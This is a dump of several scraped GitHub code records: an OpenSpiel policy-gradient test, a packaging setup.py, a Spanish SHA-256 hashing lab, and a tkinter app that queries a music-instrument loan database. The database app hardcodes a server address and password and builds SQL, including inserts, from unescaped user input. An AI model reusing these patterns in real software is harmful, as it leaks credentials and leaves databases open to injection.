num_actions=num_actions,\n loss_str=\"neurd\",\n hidden_layers_sizes=[32],\n batch_size=16,\n entropy_cost=0.001,\n critic_learning_rate=0.01,\n pi_learning_rate=0.01,\n num_critic_before_pi=4) for player_id in [0, 1]\n ]\n expl_policies_avg = kuhn_policy_gradient.PolicyGradientPolicies(env, agents)\n\n for _ in range(100):\n time_step = env.reset()\n while not time_step.last():\n current_player = time_step.observations[\"current_player\"]\n current_agent = agents[current_player]\n agent_output = current_agent.step(time_step)\n time_step = env.step([agent_output.action])\n\n for agent in agents:\n agent.step(time_step)\n\n expl = exploitability.exploitability(env.game, expl_policies_avg)\n # Check the exploitability is less than the target upper bound.\n self.assertLess(expl, 0.7)\n\n def test_run_hanabi(self):\n # Hanabi is an optional game, so check we have it before running the test.\n game = \"hanabi\"\n if game not in pyspiel.registered_names():\n return\n\n num_players = 3\n env_configs = {\n \"players\": num_players,\n \"max_life_tokens\": 1,\n \"colors\": 2,\n \"ranks\": 3,\n \"hand_size\": 2,\n \"max_information_tokens\": 3,\n \"discount\": 0.99\n }\n env = rl_environment.Environment(game, **env_configs)\n env.seed(SEED)\n info_state_size = env.observation_spec()[\"info_state\"][0]\n num_actions = env.action_spec()[\"num_actions\"]\n\n agents = [\n policy_gradient.PolicyGradient( # pylint: disable=g-complex-comprehension\n player_id=player_id,\n info_state_size=info_state_size,\n num_actions=num_actions,\n hidden_layers_sizes=[8, 8],\n batch_size=16,\n entropy_cost=0.001,\n critic_learning_rate=0.001,\n pi_learning_rate=0.001,\n num_critic_before_pi=4) for player_id in range(num_players)\n ]\n\n time_step = env.reset()\n while not time_step.last():\n current_player = time_step.observations[\"current_player\"]\n agent_output = [agent.step(time_step) for agent in agents]\n time_step = env.step([agent_output[current_player].action])\n\n for agent in agents:\n agent.step(time_step)\n\n def test_loss_modes(self):\n loss_dict = {\n \"qpg\": rl_losses.BatchQPGLoss,\n \"rpg\": rl_losses.BatchRPGLoss,\n \"rm\": rl_losses.BatchRMLoss,\n \"a2c\": rl_losses.BatchA2CLoss,\n \"neurd\": rl_losses.BatchNeuRDLoss,\n }\n\n for loss_str, loss_class in loss_dict.items():\n agent_by_str = policy_gradient.PolicyGradient(\n player_id=0,\n info_state_size=32,\n num_actions=2,\n loss_str=loss_str,\n loss_class=None)\n agent_by_class = policy_gradient.PolicyGradient(\n player_id=0,\n info_state_size=32,\n num_actions=2,\n loss_str=None,\n loss_class=loss_class)\n\n self.assertEqual(agent_by_str._loss_class, agent_by_class._loss_class)\n\n\nif __name__ == \"__main__\":\n np.random.seed(SEED)\n torch.manual_seed(SEED)\n absltest.main()\n","repo_name":"deepmind/open_spiel","sub_path":"open_spiel/python/pytorch/policy_gradient_pytorch_test.py","file_name":"policy_gradient_pytorch_test.py","file_ext":"py","file_size_in_byte":5281,"program_lang":"python","lang":"en","doc_type":"code","stars":3700,"dataset":"github-code","pt":"37"} +{"seq_id":"3558061192","text":"#!/usr/bin/env python\n\nfrom setuptools import setup, find_packages\n\nimport fancyunittest\n\ntry:\n description = open('README.md').read()\nexcept:\n description = __doc__\n\nscripts = {\n 'console_scripts': ['fancyunittest = fancyunittest.main:main']\n}\n\nsetup(name='fancyunittest',\n version=fancyunittest.__version__,\n description=\"Python's unittest extension to colorize its output.\",\n long_description=description,\n license='New BSD License',\n author='Anler',\n author_email='anler86@gmail.com',\n url='https://github.com/ikame/Fancy-Unittest',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Environment :: Console',\n 'Operating System :: Unix',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python',\n 'Topic :: Software Development',\n 'Topic :: Software Development :: Testing',\n ],\n keywords=\"unittest colorize visualize output\",\n packages=find_packages(),\n entry_points=scripts)\n","repo_name":"anler/Fancy-Unittest","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"12065737577","text":"import hashlib\r\nimport random\r\nimport time\r\n\r\ndef generar_resumenSHA256_fichero(nombre_fichero):\r\n\r\n sha256 = hashlib.sha256()\r\n with open(nombre_fichero, \"rb\") as archivo:\r\n bloque = archivo.read()\r\n # Actualiza el objeto SHA-256 con el contenido del bloque\r\n sha256.update(bloque)\r\n\r\n # Devuelve el resumen SHA-256 como una cadena hexadecimal\r\n return sha256.hexdigest()\r\n\r\ndef generar_secuencia_identificador(estudiante_id):\r\n # Genera una secuencia de 8 caracteres en hexadecimal\r\n secuencia_hex = ''.join(random.choice('abcdef0123456789') for _ in range(8))\r\n \r\n # Genera la línea con la secuencia hexadecimal, el identificador público y 100\r\n linea = f\"{secuencia_hex}\\t{estudiante_id}\\t100\"\r\n return linea\r\n\r\ndef crear_archivo_modificado(archivo_entrada, archivo_salida, estudiante_id):\r\n \r\n with open(archivo_entrada, \"r\") as entrada:\r\n # Lee el contenido completo del archivo de entrada\r\n contenido_entrada = entrada.read()\r\n\r\n start_time = time.time()\r\n max_ceros_resumen = None\r\n resumen_almacenado = None\r\n\r\n while time.time() - start_time < 60:\r\n # Genera una cadena aleatoria y calcula su resumen SHA-256\r\n cadena_aleatoria = ''.join(random.choices('0123456789abcdef', k=32)) + contenido_entrada\r\n resumen = hashlib.sha256(cadena_aleatoria.encode()).hexdigest()\r\n\r\n long_prefijo_ceros = len(resumen) - len(resumen.lstrip('0'))\r\n\r\n # Verifica si el resumen comienza con un prefijo de ceros más largo que el máximo encontrado hasta ahora\r\n if resumen_almacenado is None or long_prefijo_ceros > max_ceros_resumen:\r\n max_ceros_resumen = long_prefijo_ceros\r\n resumen_almacenado = resumen\r\n\r\n if max_ceros_resumen is not None and resumen_almacenado:\r\n # Abre el archivo de salida en modo escritura\r\n print(\"Resumen con secuencia mas larga de ceros obtenida en el tiempo de computación previsto: \" + resumen_almacenado)\r\n with open(archivo_salida, \"w\") as salida:\r\n # Escribe el contenido del archivo de entrada en el archivo de salida\r\n salida.write(contenido_entrada)\r\n\r\n # Escribe la línea adicional con la secuencia y el resumen SHA-256 con el mayor prefijo de ceros\r\n secuencia_identificador = generar_secuencia_identificador(estudiante_id)\r\n salida.write(\"\\n\" + secuencia_identificador)\r\n else:\r\n print(\"No se encontró un resumen que cumpla con los criterios en un minuto.\")\r\n\r\ndef comprobar_condiciones(archivo1, archivo2, estudiante_id):\r\n # Leer el contenido del primer archivo\r\n with open(archivo1, \"r\") as file1:\r\n contenido1 = file1.read()\r\n\r\n # Leer el contenido del segundo archivo\r\n with open(archivo2, \"r\") as file2:\r\n contenido2 = file2.read()\r\n\r\n # Verificar si el contenido de archivo2 comienza con el contenido de archivo1\r\n if contenido2.startswith(contenido1):\r\n print(\"El segundo archivo comienza con el mismo contenido que el primero.\")\r\n\r\n # Extraer la línea adicional del segundo archivo\r\n lineas_archivo2 = contenido2.split('\\n')\r\n if len(lineas_archivo2) > 1:\r\n linea_adicional = lineas_archivo2[-1] # Suponemos que la línea adicional es la segunda línea\r\n\r\n # Dividir la línea adicional en sus partes\r\n partes = linea_adicional.split('\\t')\r\n if len(partes) == 3:\r\n secuencia_hexadecimal, id, cien = partes\r\n\r\n # Verificar que la secuencia hexadecimal tenga 8 caracteres\r\n if len(secuencia_hexadecimal) == 8 and all(c in \"0123456789abcdefABCDEF\" for c in secuencia_hexadecimal):\r\n # Verificar que el ID, el número 100 y el resumen SHA-256 estén presentes en sus posiciones correspondientes\r\n if id == estudiante_id and cien == \"100\":\r\n # Calcular el resumen SHA-256 del contenido del segundo archivo\r\n resumen_archivo2 = hashlib.sha256(contenido2.encode()).hexdigest()\r\n # Verificar si el resumen_archivo2 comienza con una secuencia de 0's\r\n if resumen_archivo2.startswith(\"00\"):\r\n print(\"La línea adicional cumple con las condiciones y el resumen SHA-256 tiene un prefijo de 0's.\")\r\n else:\r\n print(\"La línea adicional cumple con las condiciones, pero el resumen SHA-256 no tiene un prefijo de 0's.\")\r\n else:\r\n print(\"La línea adicional no cumple con las condiciones especificadas.\")\r\n else:\r\n print(\"La secuencia hexadecimal no tiene 8 caracteres.\")\r\n else:\r\n print(\"La línea adicional no tiene el formato esperado.\")\r\n else:\r\n print(\"El segundo archivo no contiene una línea adicional.\")\r\n else:\r\n print(\"El segundo archivo no comienza con el mismo contenido que el primero.\")\r\n\r\n\r\n\r\n#CODIGO DE EXPERIMENTACION\r\ncrear_archivo_modificado(\"SGSSI-23.CB.03.txt\", \"SGSSI-23.CB.03.4e.txt\", \"4e\")\r\ncomprobar_condiciones(\"SGSSI-23.CB.02.txt\", \"SGSSI-23.CB.02_modificado.txt\", \"4e\")\r\n","repo_name":"Mikeloon/SGSSI-23_LABS_MLON","sub_path":"Lab05_SGSSI.py","file_name":"Lab05_SGSSI.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23146288896","text":"import tkinter as tk\r\n#from tkinter import ttk, messagebox\r\nimport ttkbootstrap as ttk\r\nfrom ttkbootstrap import Style, Notebook\r\nfrom tkinter import messagebox\r\nimport psycopg2\r\nfrom PIL import Image, ImageTk\r\nimport matplotlib.pyplot as plt\r\n\r\n'''\r\n NOTA: ComboBox_Query1 se llama ComboBox pero es una Query fija, Se mantiene asi por orden.\r\n \r\n NOTA: Hay un elemento de 'tk.entry', Esta comentado, pero se mantiene por conveniencia.\r\n \r\n \r\n NO SE SABE:\r\n - Hay que hacer login dentro del programa en vez de poner datos de psycopg en codigo ??\r\n \r\n \r\n TODO:\r\n # TAB 3 Registros -->\r\n *** Por ahora funciona sobre la tabla 'test_registros' -- CAMBIAR a tablas reales.\r\n NOTA: Consultar con equipo si las funciones de registros estan listas o falta agregar algo. \r\n \r\n TODO Maxima prioridad: Nombre de tablas: Esperar a ver que hace marco con los nombres de las tablas.\r\n \r\n \r\n \r\n'''\r\n\r\n\r\n\r\n# Configuracion de psycop CONNECT con PostgresSQL\r\nconnection = psycopg2.connect(\r\n host=\"10.4.3.195\", # PUERTO 5432\r\n database=\"instrumentos\",\r\n user=\"instrumentos_dev\", # Temporal! - Cambiar a 'instrumento'\r\n password=\"5jaLgi6\"\r\n)\r\n\r\n# Crea cursor para hacer las consultas\r\ncrsr = connection.cursor()\r\n\r\n# Elementos U.I. de programa. ---->\r\n\r\n\r\n#root = ttk.Window(themename = 'yeti') # Tema claro\r\nroot = ttk.Window(themename = 'superhero') # temas oscuros: superhero, Darkly, Vapor\r\nroot.geometry(\"550x440\") # Tamano ventana fijo -> Con linea siguiente no es necesario. Se comenta\r\nroot.resizable(False, False) # Hace ventana no modificable. Ahorra hacerla dinamica.\r\nroot.title(\"Base de Datos Instrumentos\")\r\n\r\n\r\n\r\n# Creacion NOTEBOOK TABS \r\n\r\n# Crea un ttkbootstrap notebook, y agrega a ventana principal\r\nnotebook = Notebook(root, style=\"primary.TNotebook\")\r\n#notebook.pack(fill=\"both\", expand=True)\r\nnotebook.grid(row=0, column=0, padx=10, pady=10, sticky=\"nsew\")\r\n\r\n# crea tabs para notebook\r\ntab1 = tk.Frame(notebook)\r\ntab2 = tk.Frame(notebook)\r\ntab3 = tk.Frame(notebook)\r\ntab4 = tk.Frame(notebook)\r\ntab5 = tk.Frame(notebook)\r\n\r\n# agrega las tabs al notebook\r\nnotebook.add(tab1, text=\"Inicio\")\r\nnotebook.add(tab2, text=\"Consultas Rapidas\")\r\nnotebook.add(tab4, text=\"Consultas Inventario\")\r\nnotebook.add(tab5, text=\"Visualizacion\")\r\nnotebook.add(tab3, text=\"REGISTROS\")\r\n\r\n\r\n# Muestra resultados en una nueva ventana resultado. (usa treeview)\r\ndef display_results_in_window(results):\r\n # Create a new window to display the results\r\n result_window = tk.Toplevel(root)\r\n result_window.title(\"Resultado Consulta\")\r\n\r\n # Create a treeview widget to display the results\r\n result_tree = ttk.Treeview(result_window, show=\"headings\")\r\n result_tree.grid(row=0, column=0, padx=10, pady=10, sticky=\"nsew\")\r\n\r\n # Create a vertical scrollbar\r\n y_scrollbar = ttk.Scrollbar(result_window, orient=\"vertical\", command=result_tree.yview)\r\n y_scrollbar.grid(row=0, column=1, sticky=\"ns\")\r\n result_tree.configure(yscrollcommand=y_scrollbar.set)\r\n\r\n # Display column names\r\n columns = [desc[0] for desc in crsr.description]\r\n result_tree[\"columns\"] = columns\r\n for col in columns:\r\n result_tree.heading(col, text=col)\r\n result_tree.column(col, anchor=tk.CENTER)\r\n\r\n # Display data\r\n for i, row in enumerate(results, 1):\r\n result_tree.insert(\"\", \"end\", iid=i, values=tuple(row))\r\n\r\n # Update the window's layout to make it resizable\r\n result_window.grid_rowconfigure(0, weight=1)\r\n result_window.grid_columnconfigure(0, weight=1)\r\n\r\n\r\n# Logica Consultas. --->\r\n\r\n# #### CONSULTAS RAPIDAS DE TAB.2\r\n\r\n# Ejecuta query de grupo combobox 1 - Ver estudiantes\r\ndef execute_combobox_query1():\r\n query = f\"SELECT * FROM estudiante\"\r\n try:\r\n crsr.execute(query)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n\r\n\r\n\r\n# Ejecuta query de grupo combobox 2 - Ver Prestamos * Eventual y Anual\r\ndef execute_combobox_query2():\r\n selected_item = combobox_query2.get()\r\n\r\n if selected_item == \"Eventual\":\r\n query = f\"SELECT NombreDePila AS Nombre_Estudiante, rut AS rut_Estudiante, i.numSerie AS Num_Serie_Intrumento, i.nombre \\\r\n FROM Estudiante e \\\r\n INNER JOIN prestamo_eventual p ON e.rut = p.rutest \\\r\n INNER JOIN Instrumento i ON p.NumSerieInst = i.NumSerie\\\r\n ORDER BY FechaInicio DESC\"\r\n try:\r\n crsr.execute(query)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n else:\r\n query = f\"SELECT NombreDePila AS Nombre_Estudiante, rut AS rut_Estudiante, i.numSerie AS Num_Serie_Intrumento, i.nombre\\\r\n FROM Estudiante e \\\r\n INNER JOIN gestiona g ON e.rut = g.rutest \\\r\n INNER JOIN instrumento i ON g.numserieinst = i.numserie\"\r\n try:\r\n crsr.execute(query)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n\r\n\r\n# Ejecuta query de grupo combobox 3. 'Ver Instrumento'\r\n# TODO: Agregar mas tipos de instrumentos.\r\ndef execute_combobox_query3():\r\n selected_item = combobox_query3.get()\r\n\r\n if selected_item == \"\":\r\n query = f\"SELECT * FROM instrumento\"\r\n try:\r\n crsr.execute(query)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n elif selected_item == \"Todos\":\r\n query = f\"SELECT * FROM instrumento\"\r\n try:\r\n crsr.execute(query)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n else:\r\n query = f\"SELECT * FROM instrumento WHERE nombre = '{selected_item}'\"\r\n try:\r\n crsr.execute(query)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n\r\n\r\n# Ejecuta query de grupo combobox 4. - Ver prestamos de estudiante especifico por rut\r\ndef execute_combobox_query4():\r\n selected_item = combobox_query4.get()\r\n query = f\"SELECT e.RUT AS RUT_Estudiante, i.NumSerie AS Num_Serie_Instrumento, i.nombre, s.EstadoSolicitud, COUNT(s.RutEst) AS Cant_Veces_Prestado \\\r\n FROM Estudiante e \\\r\n INNER JOIN Solicita s ON e.RUT = s.RutEst \\\r\n INNER JOIN Instrumento i ON i.NumSerie = s.NumSerieInst \\\r\n WHERE e.RUT = '{selected_item}' \\\r\n GROUP BY e.RUT, s.RutEst, i.NumSerie, s.EstadoSolicitud\"\r\n try:\r\n crsr.execute(query)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n \r\n \r\n \r\ndef execute_combobox_query5():\r\n print(\"Consulta 5 tab.2 seleccionada\")\r\n selected_item = combobox_query5.get()\r\n \r\n query_todos = f\"SELECT nombre, COUNT(*) AS Stock\\\r\n FROM instrumento\\\r\n GROUP BY nombre\\\r\n ORDER BY COUNT(*) DESC\"\r\n \r\n query_disponibles = f\"SELECT nombre, COUNT(*) AS Stock\\\r\n FROM instrumento\\\r\n WHERE estado = 'Disponible'\\\r\n GROUP BY nombre\\\r\n ORDER BY COUNT(*) DESC\"\r\n \r\n query_reparacion = f\"SELECT nombre, COUNT(*) AS Stock\\\r\n FROM instrumento\\\r\n WHERE estado = 'En reparacion'\\\r\n GROUP BY nombre\\\r\n ORDER BY COUNT(*) DESC\"\r\n \r\n query_revision = f\"SELECT nombre, COUNT(*) AS Stock\\\r\n FROM instrumento\\\r\n WHERE estado = 'En revision'\\\r\n GROUP BY nombre\\\r\n ORDER BY COUNT(*) DESC\"\r\n \r\n query_total = f\"SELECT COUNT(*) AS Stock_TOTAL\\\r\n FROM instrumento\"\r\n \r\n try:\r\n if selected_item == \"Todos\":\r\n crsr.execute(query_todos)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n \r\n if selected_item == \"Disponibles\":\r\n crsr.execute(query_disponibles)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n \r\n if selected_item == \"En Reparacion\":\r\n crsr.execute(query_reparacion)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n \r\n if selected_item == \"En Revision\":\r\n crsr.execute(query_revision)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n \r\n if selected_item == \"TOTAL\":\r\n crsr.execute(query_total)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n \r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n\r\n# ### UPDATES para registros en las ventanas que se abren desde TAB.3\r\n\r\ndef registrar_prestamo_eventual():\r\n \r\n registro_rutest = entry_rut_prestamo_eventual.get()\r\n registro_rutenc = entry_rut2_prestamo_eventual.get()\r\n registro_numserie = entry_numserie_eventual.get()\r\n registro_fecha_solicitud = entry_fecha_solicitud_eventual.get()\r\n \r\n print(\"REGISTRA PROFESOR CON ESTOS DATOS\")\r\n print(\"RUTest:\", registro_rutest)\r\n print(\"rutenc:\", registro_rutenc)\r\n print(\"numserie:\", registro_numserie)\r\n print(\"fecha_solicitud:\", registro_fecha_solicitud)\r\n \r\n \r\n \r\n query_update = f\"INSERT INTO prestamo_eventual (rutest, rutenc, numserieinst, fechainicio)\\\r\n VALUES ('{registro_rutest}', '{registro_rutenc}', '{registro_numserie}', '{registro_fecha_solicitud}');\"\r\n \r\n update_cursor = connection.cursor() # Cursor para hacer update * TEST\r\n \r\n try:\r\n update_cursor.execute(query_update)\r\n connection.commit()\r\n update_cursor.close()\r\n messagebox.showinfo(\"Success\", \"Registro actualizado exitosamente\")\r\n print('Exito: Se actualizo el registro con la query: ')\r\n print(f\"INSERT INTO Test_Registros (rut_profesor, nombredepila, apellido1, apellido2)\\\r\n VALUES ('{registro_rutest}', '{registro_rutenc}', '{registro_numserie}', '{registro_fecha_solicitud}')\")\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n \r\n# ### CONSULTAS PARA consultas_proyecto EN TAB.4\r\n\r\n# Muestra el top 20 de instrumentos con mayor Avaluo\r\ndef execute_query_proyecto_1():\r\n print(\"Se llama a EXECUTE QUERY para consulta 1 tab.4\")\r\n \r\n query_string = f\"SELECT nombre, numserie, avaluo \\\r\n FROM instrumento \\\r\n WHERE avaluo IS NOT NULL\\\r\n ORDER BY avaluo DESC LIMIT 20\"\r\n \r\n try:\r\n crsr.execute(query_string)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n except Exception as error:\r\n print('ERROR EXCEPT consulta 1 rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n \r\n# Muestra instrumentos que esten disponibles para prestamo \r\ndef execute_query_proyecto_2():\r\n print(\"Se llama a EXECUTE QUERY para consulta 2 tab.4\")\r\n \r\n \r\n query_string = f\"SELECT nombre, numserie, medidas \\\r\n FROM instrumento \\\r\n WHERE estado = 'Disponible'\"\r\n \r\n try:\r\n crsr.execute(query_string)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n except Exception as error:\r\n print('ERROR EXCEPT consulta 1 rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n \r\n\r\ndef execute_query_proyecto_3():\r\n print(\"Se llama a EXECUTE QUERY para consulta 3 tab.4\")\r\n # Esta funcion usa informacion extraida de una ventana formulario\r\n \r\n ven3_inicio = ven3_entry_inicio.get() # FECHAS\r\n ven3_termino = ven3_entry_termino.get()\r\n \r\n print(f\"Se van a usar los valores: {ven3_inicio}, {ven3_termino}\")\r\n \r\n \r\n query_string = f\"SELECT COUNT(*) AS cantidadcatedras, SUM(i.avaluo)\\\r\n FROM catedras c, solicita s, instrumento i, gestiona g, contratodecomodato cdc\\\r\n WHERE c.rutest=s.rutest AND c.rutprof=s.rutprof AND s.numserieinst=i.numserie\\\r\n AND s.numserieinst=g.numserieinst AND g.codigodelcontrato=cdc.codigocontrato\\\r\n AND cdc.fechainicio BETWEEN '{ven3_inicio}' AND '{ven3_termino}'\\\r\n AND s.tipodeprestamo='Anual' AND s.estadosolicitud NOT IN ('Rechazado')\"\r\n \r\n try:\r\n crsr.execute(query_string)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n except Exception as error:\r\n print('ERROR EXCEPT consulta 1 rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n messagebox.showerror(\"Error\", \"Ingrese los datos en los campos antes de consultar. Ejemplo de formato fecha: 2023-10-18\")\r\n connection.rollback()\r\n\r\ndef execute_query_proyecto_4():\r\n print(\"Se llama a EXECUTE QUERY para consulta 4 tab.4\")\r\n \r\n query_string = f\"SELECT e.nombredepila as nombre_est, s.rutest, i.nombre as nombreinst, s.numserieinst,\\\r\n EXTRACT(day FROM age(current_date, s.fechasolicitud)) AS dias_pasados\\\r\n FROM estudiante e, instrumento i, solicita s\\\r\n WHERE e.rut = s.rutest AND i.numserie = s.numserieinst\\\r\n AND s.tipodeprestamo = 'Eventual'\"\r\n \r\n try:\r\n crsr.execute(query_string)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n except Exception as error:\r\n print('ERROR EXCEPT consulta 1 rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback()\r\n\r\n# Prestamos de un tipo de instrumento especifico entre 2 fechas especificas.\r\ndef execute_query_proyecto_5():\r\n print(\"Se llama a EXECUTE QUERY para consulta 5 tab.4\")\r\n # Se pueden sacar los prints despues, Son para comprobar que se estan comunicando correctamente las funciones\r\n \r\n ven5_tipo_instrumento = ven5_combo_tipo_instrumento.get()\r\n ven5_inicio = ven5_entry_inicio.get()\r\n ven5_termino = ven5_entry_termino.get()\r\n \r\n print(f\"Se van a usar los valores: {ven5_tipo_instrumento}, {ven5_inicio}, {ven5_termino}\")\r\n \r\n \r\n \r\n query_string = f\"SELECT CD.CodigoContrato, COUNT(*) AS CantidadPrestamos\\\r\n FROM ContratoDeComodato AS CD\\\r\n JOIN Gestiona AS GD ON CD.CodigoContrato = GD.CodigoDelContrato\\\r\n JOIN instrumento AS I ON GD.NumSerieInst = I.numserie\\\r\n WHERE I.nombre = '{ven5_tipo_instrumento}' AND CD.FechaInicio\\\r\n BETWEEN '{ven5_inicio}' AND '{ven5_termino}'\\\r\n GROUP BY CD.CodigoContrato\"\r\n \r\n try:\r\n crsr.execute(query_string)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n except Exception as error:\r\n print('ERROR EXCEPT consulta 1 rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n messagebox.showerror(\"Error\", \"Ingrese los datos en los campos antes de consultar. Ejemplo de formato fecha: 2023-10-18\")\r\n connection.rollback()\r\n\r\n\r\ndef execute_query_proyecto_6():\r\n print(\"Se llama a EXECUTE QUERY para consulta 6 tab.4\")\r\n # MARCO ESTA TRABAJANDO EN ESTA QUERY\r\n \r\n ven6_tipo_prestamo = ven6_combo_tipo_prestamo.get()\r\n ven6_inicio = ven6_entry_inicio.get()\r\n ven6_termino = ven6_entry_termino.get()\r\n \r\n print(f\"Se van a usar los valores: {ven6_combo_tipo_prestamo}, {ven6_inicio}, {ven6_termino}\")\r\n \r\n \r\n \r\n query_string_anual = f\"SELECT SUM(i.avaluo) AS suma_avaluos, c.catedra, count(c.catedra) AS cantidad_catedra\\\r\n FROM instrumento i, solicita s, catedras c, gestiona g, contratodecomodato cdc\\\r\n WHERE i.numserie=s.numserieinst AND s.rutest=c.rutest AND s.rutprof=c.rutprof\\\r\n AND g.numserieinst=s.numserieinst AND cdc.codigocontrato=g.codigodelcontrato\\\r\n AND s.tipodeprestamo='Anual' AND s.estadosolicitud NOT IN ('Rechazado')\\\r\n AND cdc.fechainicio BETWEEN '{ven6_inicio}' AND '{ven6_termino}'\\\r\n GROUP BY c.catedra\\\r\n ORDER BY cantidad_catedra DESC LIMIT 1\"\r\n \r\n query_string_eventual = f\"SELECT SUM(i.avaluo) AS suma_avaluos, c.catedra, count(c.catedra) AS cantidad_catedra\\\r\n FROM instrumento i, solicita s, catedras c, prestamo_eventual p\\\r\n WHERE i.numserie=s.numserieinst AND s.rutest=c.rutest AND s.rutprof=c.rutprof\\\r\n AND p.fechainicio=s.fechasolicitud AND s.tipodeprestamo='Eventual'\\\r\n AND s.estadosolicitud NOT IN ('Rechazado') AND p.fechainicio BETWEEN '{ven6_inicio}' AND '{ven6_termino}'\\\r\n GROUP BY c.catedra\\\r\n ORDER BY cantidad_catedra DESC LIMIT 1\"\r\n \r\n query_string_ambos = f\"SELECT SUM(i.avaluo) AS suma_avaluos, c.catedra, COUNT(c.catedra) AS cantidad_catedra, 'Eventual' AS tipo_prestamo\\\r\n FROM instrumento i, solicita s, catedras c, prestamo_eventual p\\\r\n WHERE i.numserie = s.numserieinst \\\r\n AND s.rutest = c.rutest \\\r\n AND s.rutprof = c.rutprof\\\r\n AND p.fechainicio = s.fechasolicitud \\\r\n AND s.tipodeprestamo = 'Eventual'\\\r\n AND s.estadosolicitud NOT IN ('Rechazado') \\\r\n AND p.fechainicio BETWEEN '{ven6_inicio}' AND '{ven6_termino}'\\\r\n GROUP BY c.catedra, tipo_prestamo\\\r\n UNION\\\r\n SELECT SUM(i.avaluo) AS suma_avaluos, c.catedra, COUNT(c.catedra) AS cantidad_catedra, 'Anual' AS tipo_prestamo\\\r\n FROM instrumento i, solicita s, catedras c, gestiona g, contratodecomodato cdc\\\r\n WHERE i.numserie = s.numserieinst \\\r\n AND s.rutest = c.rutest \\\r\n AND s.rutprof = c.rutprof\\\r\n AND g.numserieinst = s.numserieinst \\\r\n AND cdc.codigocontrato = g.codigodelcontrato\\\r\n AND s.tipodeprestamo = 'Anual' \\\r\n AND s.estadosolicitud NOT IN ('Rechazado')\\\r\n AND cdc.fechainicio BETWEEN '{ven6_inicio}' AND '{ven6_termino}'\\\r\n GROUP BY c.catedra, tipo_prestamo\\\r\n ORDER BY cantidad_catedra DESC \\\r\n LIMIT 1\"\r\n \r\n \r\n try:\r\n if ven6_tipo_prestamo == 'Anual':\r\n crsr.execute(query_string_anual)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n \r\n if ven6_tipo_prestamo == 'Eventual':\r\n crsr.execute(query_string_eventual)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n \r\n if ven6_tipo_prestamo == 'Ambos':\r\n crsr.execute(query_string_ambos)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n \r\n except Exception as error:\r\n print('ERROR EXCEPT consulta 1 rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n messagebox.showerror(\"Error\", \"Ingrese los datos en los campos antes de consultar. Ejemplo de formato fecha: 